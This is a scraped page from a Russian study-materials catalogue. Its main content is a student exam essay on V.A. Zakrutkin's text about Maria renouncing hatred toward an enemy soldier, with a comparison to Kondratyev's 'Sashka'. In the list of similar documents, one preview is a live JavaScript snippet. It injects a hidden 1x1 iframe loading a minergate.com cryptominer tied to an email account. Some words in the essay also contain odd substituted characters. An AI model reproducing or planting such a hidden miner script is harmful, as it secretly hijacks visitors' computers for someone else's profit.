-



   Часть С (текст В.А.Закруткина)




doc.png  Тип документа: Сочинения


type.png  Предмет: ЕГЭ


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

Часть С (текст В.А.Закруткина)

Что вызывает в нас ненависть? Можно ли отказаться от этого чувства, подавить желание мести? Над этими вопросами заставляет задуматься нас, читателей, текст Виталия Александровича Закруткина.
Марию, героиню романа, охватили «ненависть и горячая, слепая злоба», когда она встретила живого немца, солдата вражеской армии, принёсшей ей «смерти мужа и сына», «мученические дни и ночи». Но даже в такое тяжёлое и страшное время как военное, в героине остаются человеческие чувства, способность сострадать и понять. «Святое слово “мама”» пронзило сердце Марии, и она опомнилась, смогла не уподобиться тем, кто принёс страдания ей- героиня отказывается от мести, в ней уже нет той ненависти, она «отстаивает уходящую жизнь» ᴘẚʜᴇного.
Автор текста призывает читателя брать пример с поступка Марии- не поддаваться «слепой злобе» и не терять способности сострадать, уметь быть милосердными и к врагу своему.
Безусловно, к призыву автора стоит прислушаться. Ведь люди должны иметь не только человеческий облик, но и человеческие чувства, быть гуманными и не попадать в плен к ненависти и злобе. Как говорил французский философ Жан- Поль Сартр: «Достаточно, чтобы один человек ненавидел другого,- и ненависть, перехоя от соседа к соседу, заражает всё человечество», а Хамиль Джубран считал, что «ненависть – нечто мёртвое».
Подобно Марии забыл об этом «мёртвом» чувстве Сашка- герой рассказа «Сашка» Кондратьева Николая Дмитриевича. Впервые встретившись с врагом, юноша даёт понять немцу, что «русские над пленными не издеваются». У Сашки темнеет в глазах, когда тот получает приказ расстрелять «языка». Он не представляет, что может убить кого-то, даже если ϶ᴛόᴛкто-то – враг, солдат неприятельской армии.
Итак, Виталий Александрович Закруткин призывает читателей подавить желание мести, не проявлять ненависть и быть милосердными.



Похожие документы


Коммуникативное обучение русскому языку. Часть вторая
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })(); ...

Интегрированный урок по изучению комедии «Мещанин во дворянстве». Часть вторая
...

Изучение поэзии Такубоку в контексте японского искусства. Часть вторая
...

Избранное из «Жизненной драмы Платона» Часть вторая
И Платон и Гамлет, из страшного положения в начале их жизни оба вынесли, собственно, лишь ряд разговоров. Разговоры Гамлета глубокомысленны и остроумны. Разговоры Платона, с возражениями и дополнениями Аристотеля и стоиков и с заключениями новоплатоников, создали целый умственный мир, называемый греческою философией, и вошли в историческое развитие христианства как его главная основа. И все-таки приходится сказать, что жизненная трагедия Платона имела не только страшное начало, но и плачевный конец, как то и следует для настоящей трагедии. Из своего жизненного испытания он вышел хотя не без славы, но без победы. Подобно шекспировскому Гамлету — в отличие от сумароковского — он не мог жениться на своей Офелии: она утонула. В конце концов Платон, как Гамлет, оказался неудачником, хотя, разумеется, неудачи великого человека дают миру гораздо больше, чем множество самых блестящих удач людей обыкновенных....

Борисов Л. Под флагом Катрионы. Часть четвертая. Скитания. Глава вторая
Борисов Л. : Под флагом Катрионы. Часть четвертая. Скитания. Глава вторая "Нептун", - подсказал Симпсон. - "Одиннадцать тысяч дев", - не думая и радуясь находке, произнес Луи. - Недурно, а? Я засяду в каюте и с утра до вечера буду писать рассказы. Для романа мне нужен разбег. Для оседлой жизни - деньги. ...

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям